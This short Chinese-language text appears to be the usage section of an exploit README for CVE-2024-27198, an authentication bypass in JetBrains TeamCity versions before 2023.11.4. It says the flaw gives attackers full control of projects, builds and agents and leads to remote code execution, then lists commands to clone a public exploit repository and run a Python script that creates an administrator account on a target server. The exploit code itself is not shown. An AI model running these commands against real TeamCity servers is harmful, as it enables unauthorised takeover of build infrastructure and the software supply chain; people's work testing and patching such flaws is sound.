在 2023.11.4 之前的 JetBrains TeamCity 中存在身份验证绕过漏洞,允许在 TeamCity 服务器上执行管理员操作,攻击者可完全控制所有 TeamCity 项目、构建、代理和构件,最终攻击者将实现远程代码执行(RCE)。
git clone https://github.com/jrbH4CK/CVE-2024-27198.git
cd CVE-2024-27198
在服务器内创建一个具有管理员权限的账户
python3 cve-2024-27198.py http://example.com username password

